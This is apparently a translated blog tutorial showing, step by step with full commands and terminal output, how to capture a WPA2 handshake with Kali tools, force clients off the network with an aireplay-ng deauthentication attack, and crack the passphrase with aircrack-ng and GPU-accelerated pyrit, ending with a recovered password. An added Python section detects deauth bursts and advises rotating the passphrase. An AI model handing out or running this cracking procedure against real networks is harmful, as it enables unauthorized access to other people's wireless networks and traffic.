Kali wireless cracking: a practical example

Intrusion and penetration · hacker · 2016-09-05 10:20:11

First you need a machine running Kali Linux, either a virtual machine or a physical one, and a wireless adapter that supports monitor mode.

    root@kali:~# iwconfig 
    wlan1     IEEE 802.11bg  ESSID:off/any  
              Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
              Retry short limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              
    eth0      no wireless extensions.
    lo        no wireless extensions.

Check the wireless adapter's device name (the `iwconfig` output above).

    root@kali:~# airmon-ng start wlan1
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e 
    PID     Name
    2772    dhclient
    4415    wpa_supplicant
    Interface       Chipset         Driver
    wlan1           Realtek RTL8187L        rtl8187 - [phy0]
                                    (monitor mode enabled on mon0)

Put the adapter into monitor mode (the `airmon-ng start` output above).

`airodump-ng mon0` lists all the wireless networks it finds.
From that list, find the network you want to test and copy its BSSID.

    root@kali:~/test# airodump-ng -w nenew  -c 11 --bssid E4:D3:32:41:56:12   mon0
     CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12                                         
                                                                                                                                                                                                       
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                                       
     E4:D3:32:41:56:12  -44  53      171        7    0  11  54e. WPA2 CCMP   PSK  TP-LINK_5612                                                                                                         
                                                                                                                                                                                                       
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                         
                                                                                                                                                                                                       
     E4:D3:32:41:56:12  00:00:00:00:00:00    0    0 - 1      0    18135                                                                                                                                 
     E4:D3:32:41:56:12  64:B4:73:40:60:5C  -21    1e- 6e     0        7

When you see `WPA handshake:`, the handshake has been captured and cracking can begin.

If the handshake is never captured, you can use the following command to attack and force a re-handshake.

    aireplay-ng -0 10 -a E4:D3:32:41:56:12  -c 64:B4:73:40:60:5C  mon0  --ignore-negative-one
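
On the air, the forced re-handshake above looks like a burst of deauthentication frames for one client followed shortly by a fresh handshake, which is something a wireless monitor can alert on. The following Python detector is an added example, not part of the original post; the record format, the sample records, and the `WINDOW`, `THRESHOLD` and `FOLLOW` values are assumptions for illustration.

```python
from collections import defaultdict, deque

# Constructed sample records (not taken from the page's capture), one per frame:
# "<seconds> <frame kind> <source MAC> <destination MAC> <BSSID>"
AP, STA = "E4:D3:32:41:56:12", "64:B4:73:40:60:5C"
SAMPLE = [f"{10 + i * 0.01:.2f} deauth {AP} {STA} {AP}" for i in range(64)]
SAMPLE += [
    f"3.00 deauth {STA} {AP} {AP}",   # a single, ordinary client disconnect
    f"12.40 eapol {AP} {STA} {AP}",   # new handshake shortly after the burst
]

WINDOW = 1.0     # seconds of history kept per AP/station pair (assumed value)
THRESHOLD = 20   # deauth frames inside WINDOW that raise an alert (assumed value)
FOLLOW = 10.0    # seconds after a burst in which a handshake is linked to it (assumed)


def parse(line):
    ts, kind, src, dst, bssid = line.split()
    return float(ts), kind, src.upper(), dst.upper(), bssid.upper()


def detect(lines):
    """Return one alert per AP/station pair that saw a deauth burst."""
    recent = defaultdict(deque)   # (bssid, station) -> deauth timestamps in WINDOW
    alerts = {}                   # (bssid, station) -> alert record
    for ts, kind, src, dst, bssid in sorted(map(parse, lines)):
        station = dst if src == bssid else src
        key = (bssid, station)
        if kind == "deauth":
            q = recent[key]
            q.append(ts)
            while q and ts - q[0] > WINDOW:
                q.popleft()
            if len(q) >= THRESHOLD and key not in alerts:
                alerts[key] = {"bssid": bssid, "station": station,
                               "burst_at": ts, "handshake_after": None}
        elif kind == "eapol" and key in alerts:
            a = alerts[key]
            if a["handshake_after"] is None and 0 <= ts - a["burst_at"] <= FOLLOW:
                a["handshake_after"] = ts
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

An alert with `handshake_after` set means a handshake was on the air right after the burst, so the passphrase should be treated as exposed to offline guessing and rotated to a long random value.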

Once the handshake has been captured, you can run a dictionary against it to find the password.

    root@kali:~/test# aircrack-ng -w ./password.txt  nenew-21.cap 
    Opening nenew-21.cap
    Read 18654 packets.
       #  BSSID              ESSID                     Encryption
       1  D0:C7:C0:6E:53:53  TP-LINK_5353              WPA (1 handshake)
    Choosing first network as target.
    Opening nenew-21.cap
    Reading packets, please wait...

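How fast this runs depends on your machine's performance, and even more on your dictionary.
On a physical machine with a reasonably good graphics card, you can also use the GPU to accelerate cracking, which is far more efficient than the CPU.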

For installing the graphics driver, SDK and so on under Kali Linux, see the following links:
http://xiao106347.blog.163.com/blog/static/2159920782013113013549364
http://vistb.net/2011/08/how-to-crack-wifi-part-four/
http://blog.sina.com.cn/s/blog_56a70c040101exje.html

I used the graphics card here, and the password came out quickly.

    root@kali:~# pyrit -r nenew-21.cap  -i password.txt -b D0:C7:C0:6E:53:53 attack_passthrough
    Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    Parsing file 'nenew-21.cap' (1/1)...
    Parsed 14 packets (14 802.11-packets), got 1 AP(s)
    Tried 4420221 PMKs so far; 86496 PMKs per second.
    The password is 'qq123789'.

